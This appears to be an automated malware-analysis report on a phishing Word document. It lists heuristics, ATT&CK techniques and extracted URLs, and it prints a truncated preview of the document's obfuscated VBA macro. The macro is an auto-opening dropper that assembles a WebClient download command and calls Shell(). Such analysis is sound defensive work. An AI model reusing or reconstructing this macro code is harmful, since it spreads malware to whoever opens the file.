Verdict: MALICIOUS
Risk Score: 242
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro. The macro utilizes a Shell() call, indicating an attempt to execute external code. The ClamAV detection name 'Img.Dropper.PhishingLure-6443153-0' suggests a phishing lure that drops a payload. The embedded URLs are suspicious and likely point to the second-stage payload.
Heuristics (7)
- ClamAV: Img.Dropper.PhishingLure-6443153-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://so1Vab+VabtrantVab+VaSV62imcibVPzFPoB0G (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 77721 bytes |

SHA-256 of macros.bas: 075da81e42b77ac06e7ed1f7c9d18eced1cbe5a35521578647970faab104c157
Preview script (first 1,000 lines of the extracted script; the extraction concatenates the ThisDocument module and the nRaTaEMNjnLUMz module, which is why two Attribute VB_Name lines appear):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "nRaTaEMNjnLUMz"
Function pKRZnufRZ()
FfUZZuV = Array(UCase("aazGuiHiFwV" + "lOjzTJP" + "wINXKvDpX" + "kWmjEqMhjisWD" + "pNJsziUnDb"), UCase("RMawwfSLQLw" + "CKsmlakYc" + "qhwlKrt" + "zSLFmilkkz" + "LnMqvHhFriM"))
wYujJh = Mid("AMS2rSCSkoqXjPoFP8S2VMzbhuamvZn5MnjM", 24, 5)
wCsZsG = Array(UCase("wsPUkOFoZ" + "iwbCmiNWDjYFv" + "TrPYAiDiruKiCi" + "KDoXSkktWYqX" + "GcpszUBtz"), UCase("nukvGhsHfjls" + "jidKizszKHn" + "PEShhcrKWAc" + "pdMiQKodNzFJ" + "KSvHhdnwSr"))
rAhsZtvFrf = Array(UCase("DCMWtAMUa" + "uNjHwYOAB" + "lwQRiqBidmCnl" + "IDZHsjX" + "ztswKnKJqqj"), UCase("hElvsCziqo" + "HcjztwGIS" + "FwWYfjNTT" + "LGPSDRdPpkooKi" + "VioQLjiOCbGO"))
fiKsDTDpR = Array(UCase("wNPzNrTtrnBwtz" + "VcurpzpOvOUV" + "dqAOINFXiduC" + "VkRPAaNJhD" + "sozHzUj"), UCase("VjPBnmofsOnwA" + "QdEwfNuIawmtW" + "NwYNuBjoF" + "idMuUvuEGCYV" + "CpVzNJT"))
uFozaYAmAoz = Mid("4XUEBiARRl85+m85sVab+Vab);breaVab+VabkVab+Vab;}Vab+VabcaVm85+m85ab+VabtchVab+Vab{Vab+Vm85+m85abwritVam85+m85b+'+'VabeVab+m85+m85Vab-hostVab+Vab Vab+VabwbW_.ExceVab+Vabption.'+'MewU1662", 11, 168)
TQidQSlVM = Array(UCase("MWlPXsEBNN" + "cUrShiRosnKBZC" + "LcsMqzCG" + "TwZRRZj" + "QroqsQjY"), UCase("RWjCUMMO" + "bIAXzZOnzjFz" + "TDBlhORTML" + "ffjWAwmMCkzaH" + "sOcERzTKvCjAji"))
MJiMmdnmmX = Array(UCase("tQVSuqZEw" + "bYVSBBAn" + "BhnTusvVYZE" + "fmUlNrcaF" + "AHuwzhjnTz"), UCase("fRhFwaZwUBf" + "pwlAhoKXMZhjfZ" + "uNmkFGtzUnfQRC" + "kTVNFAMhCzJ" + "NFkAZXcfliQ"))
UivNfUEdww = Array(UCase("ZScwntXI" + "kzZSsXTcMSTU" + "zZhwZRtnFRlfbw" + "GKSkawdYq" + "slYnIjMrbT"), UCase("RoUGOvf" + "nmQbDWBAjuBV" + "qZjfVzw" + "ZoAcMpWziLAw" + "CmbKURHjczZzC"))
aaDBwjEp = Mid("jjKjCl8n.SpVab+Vablit(x1n,x1nVab+Vab);wbWkarapVab+Vabas = Vab+Vabwm85+m85bWVab+VabnVab+Vabsadasd.Vm85+m85ab+MPTUoN2P", 8, 101)
kYRldqFSG = Array(UCase("nwwQNBXtVko" + "LRUzijjlv" + "fukmFtoXqCD" + "ZIDvTBbQFcRXoI" + "iwEwiiH"), UCase("CjavdEzum" + "QrLtnMiK" + "bDcNzzqKalD" + "QSsBPtFwMH" + "iNYQrkJsQUzj"))
swTBiM = Array(UCase("OnatwiwOwQw" + "jiCFjAXKnmFUA" + "pDwraiKOIKDS" + "PsooKLi" + "ddXNYasnciFs"), UCase("tuSHqTjRV" + "CQwHSzzuJWzMa" + "dBESbjczaq" + "zVhUswSHlV" + "cSZoinwWQjUuio"))
MPrNl = Array(UCase("RIioZdJXYFLPY" + "nIdvCZkjjD" + "fwdwfnzHVp" + "oCkHiqfSBKKEL" + "EkqGIlbbPtijb"), UCase("SNIDfwUbLvvuAO" + "OVtRGbC" + "AMDQNmrd" + "PmznCHZPVcZvLO" + "MZBXkOUSQGHq"))
QwqKDzFmr = Mid("2LGp0oIab+VabSystVab+Vabem.Net.Vab+Vm85+m85abWVab+Vabem85+m85bClienVab+VabtVab+Vab;wbW'+'nsadaVab+VabsVab+VabdVab+Vab Vab+Vab=Vam85+m85b+Vm85+m85ab nVab+VabeVablS8dPjOJjbDsVVoGm9Ruq", 8, 153)
BpJtHRwTSzh = Array(UCase("NqpPEqFkU" + "QaRYiEoDjZl" + "nBoADZqdbDfck" + "RVQGWiFKNNf" + "mbfqzPdVDnaDmj"), UCase("qCNuonCnSmZCDm" + "obVFnOzkFQz" + "YdvNTqnOH" + "SrKkoNE" + "Naiazwijtj"))
cTqDVobjI = Array(UCase("fGoUSwfOPNM" + "UCkwcMpwS" + "nlTskuT" + "huQzkOnFdOiX" + "LoJPLkTnuSrJbT"), UCase("AZMlujj" + "zWSVLXibP" + "GcwKcYKAvmcZoI" + "kEDBzcRiWLttOI" + "LrbNVrHqw"))
tUwqQwhHBQ = Array(UCase("jcGDGfv" + "zTjpaqkNZ" + "jdJoGqTlFq" + "aitGiJjzKCtlT" + "UihSfpZMCmhs"), UCase("WQkUZEiXppishD" + "PUmrpFlMm" + "aBPNbHYpO" + "jahTjpLf" + "wawlLzizpDpkE"))
JWcobUZS = Mid("kv1Ts9C5Vab+'+'Vam85+m85bsm85+m85'+'sagVab+VabeVab+Va'+'b;}Vab+Vab}Vab).rePLAcE(V0VrZnR", 9, 73)
jFDrp = Array(UCase("bukuqYhKaaSiZ" + "Tozawjivr" + "akzbmEdOHNW" + "jkjnLjnhzjRJ" + "jtjsMJfCETFaGX"), UCase("zEXLvlHMtK" + "vHJitTojFK" + "VuEricQaMELSjs" + "GOJZhmho" + "XtWZmmaSL"))
DIpPrmPKdFU = Array(UCase("CzDOJNiKCStion" + "LztGXnsbQ" + "PtIimZZ" + "cfUcaBRGoYj" + "jIvfiDvijKKXn"), UCase("tUabQtUz" + "HziZroRw" + "vYXHwcEidu" + "RVwpQHzjNHmWhw" + "jwiEpPMqcOmmV"))
LUnjwRX = Array(UCase("czANXUt" + "XbwKREvcPwSCuN" + "zrKjrkkGOBcjnR" + "MoBmroPtRzDsj" + "znKPACVMoBO"), UCase("UiJpYHLajiBI" + "IiztjosBjP" + "RQmOSAAzY" + "Thkcbwh" + "qVlCssTY"))
QFLidim = Mi
```

... (preview truncated)